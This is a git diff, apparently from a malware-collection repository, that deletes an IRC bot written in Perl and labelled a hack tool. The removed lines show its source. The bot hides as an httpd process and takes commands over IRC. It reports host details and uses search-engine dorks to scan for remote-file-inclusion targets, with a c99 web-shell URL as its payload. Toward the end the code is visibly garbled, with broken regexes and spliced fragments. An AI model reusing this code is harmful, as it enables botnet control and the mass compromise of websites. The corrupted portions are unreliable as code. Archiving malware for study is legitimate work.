From cebcc12477de72bdf2a205df7cd7e4e7d1f20996 Mon Sep 17 00:00:00 2001 From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Sat, 14 Nov 2020 01:24:32 -0600 Subject: [PATCH] Delete HackTool.Perl.IrBot.d na --- Perl/HackTool.Perl.IrBot.d | 438 ------------------------------------- 1 file changed, 438 deletions(-) delete mode 100644 Perl/HackTool.Perl.IrBot.d diff --git a/Perl/HackTool.Perl.IrBot.d b/Perl/HackTool.Perl.IrBot.d deleted file mode 100644 index b14f455e..00000000 --- a/Perl/HackTool.Perl.IrBot.d +++ /dev/null @@ -1,438 +0,0 @@ -#Mic22 Is Here! - -use IO::Socket::INET; -use HTTP::Request; -use LWP::UserAgent; - -my $processo = "/usr/local/apache/bin/httpd -DSSL"; -my $cmd="http://by-gardenfox.t35.com/c99.txt?"; -my $server="irc.milw0rm.com"; -my $porta="6667"; -my $nick="[ScaN-RoX]"; -my $canale="#army"; -my $verbot = "6.51"; -my @adms=("joiner"); -my $pid=fork; -exit if $pid; -$0="$processo"."\0"x16; -my $sk = IO::Socket::INET->new(PeerAddr=>"$server",PeerPort=>"$porta",Proto=>"tcp") or die "Can not connect on server!\n"; -$sk->autoflush(1); -print $sk "NICK $nick\r\n"; -print $sk "USER Shinchi 13 * : henca : henca@prohosts.org : Shinchi :henca\r\n"; -print $sk "JOIN $canale\r\n"; - -while($line = <$sk>){ - -$line =~ s/\r\n$//; -if ($line=~ /^PING \:(.*)/) -{ -print "PONG :$1"; -print $sk "PONG :$1"; -} - -if ($line=~ /PRIVMSG $canale :.out/){ -stampa($sk, "QUIT"); -} - - -if ($line=~ /PRIVMSG $canale :.help/){ -stampa($sk, "PRIVMSG $canale :12.::[13Bantuan] 6Scanner RFI Ver $verbot (C)Mic22 , 3Color By 10Shinchi12::."); -stampa($sk, "PRIVMSG $canale :12.::[13Bantuan] 2ketik 4.scan Bug Dork 12::."); -stampa($sk, "PRIVMSG $canale :12.::[13Bantuan] 2Ketik 7.engine 2Untuk melihat searce engine yang digunakan 12::."); -stampa($sk, "PRIVMSG $canale :12.::[13bantuan] 2Ketik 7.mwultimi 2Untuk Melihat Bug di milworm 12::."); -stampa($sk, "PRIVMSG $canale :12.::[13Bantuan] 2Ketik 7.info 2Untuk Melihat status Bot/System 12::."); -stampa($sk, "PRIVMSG $canale :12.::[13Bantuan] 2Ketik 7.out 2Untuk Matikan Bot 12::."); -} - -if ($line=~ /PRIVMSG $canale :.info/){ -my $sysos = `uname -sr`; -my $uptime = `uptime`; -if ($sysos =~ /freebsd/i ) { -$sysname = `hostname`; -$memory = `expr \`cat /var/run/dmesg.boot | grep "real memory" | cut -f5 -d" "\` \/ 1048576`; -$swap = `$toploc | grep -i swap | cut -f2 -d" " | cut -f1 -d"M"`; -chomp($memory); -chomp($swap); -} -elsif ( $sysos =~ /linux/i ) { -$sysname = `hostname -f`; -$memory = `free -m |grep -i mem | awk '{print \$2}'`; -$swap = `free -m |grep -i swap | awk '{print \$2}'`; -chomp($swap); -chomp($memory); -} -else { -$sysname ="No Found";; -$memory ="No found"; -$swap ="No Found"; -} -$uptime=~s/\n//g; -$sysname=~s/\n//g; -$sysos=~s/\n//g; -stampa($sk, "PRIVMSG $canale :12.::[13Info] Server: $server :| - $porta12::."); -stampa($sk, "PRIVMSG $canale :12.::[13Info] SO/Hostname:12 $sysos - $sysname12::."); -stampa($sk, "PRIVMSG $canale :12.::[13Info] Process/PID:12 $processo - $$12::."); -stampa($sk, "PRIVMSG $canale :12.::[13Info] Uptime:12 $uptime12::."); -stampa($sk, "PRIVMSG $canale :12.::[13Info] Memory/Swap:12 $memory - $swap12::."); -stampa($sk, "PRIVMSG $canale :12.::[13Info] Perl Version/BOT:12 $] - $verbot12::."); -} - - -if ($line=~ /PRIVMSG $canale :.engine/){ -stampa($sk, "PRIVMSG $canale :12.::[13Engine] 2Google, Yahoo, MsN, Altavista, Libero, AllTheWeb, AsK, UoL, AoL 12::."); -} - -if ($line=~ /PRIVMSG $canale :.mwultimi/){ -my @ltt=(); -my @bug=(); -my $x; -my $page=""; -my $socke = IO::Socket::INET->new(PeerAddr=>"milw0rm.com",PeerPort=>"80",Proto=>"tcp") or return; -print $socke "GET http://milw0rm.com/rss.php HTTP/1.0\r\nHost: milw0rm.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; -my @r = <$socke>; -$page="@r"; -close($socke); -while ($page =~ m/
http:\/\/(.+?)\<\/p>/g){
-my $k=$1;
-my @grep=links($k);
-push(@lst,@grep);
-}}
-return @lst;
-}
-
-sub google(){
-my @lst;
-my $key = $_[0];
-for($b=0;$b<=1000;$b+=100){
-my $Go=("http://www.google.co.id/search?hl=id&q=".key($key)."&num=100&filter=0&start=".$b);
-my $Res=query($Go);
-while($Res =~ m/\"]*)\//g){
-if ($1 !~ /google/){
-my $k=$1;
-my @grep=links($k);
-push(@lst,@grep);
-}}}
-return @lst;
-}
-
-sub yahoo(){
-my @lst;
-my $key = $_[0];
-for($b=1;$b<=1000;$b+=100){
-my $Ya=("http://search.yahoo.com/search?ei=UTF-8&p=".key($key)."&n=100&fr=sfp&b=".$b);
-my $Res=query($Ya);
-while($Res =~ m/\(.+?)\<\/em>/g){
-my $k=$1;
-$k=~s///g;
-$k=~s/<\/b>//g;
-$k=~s/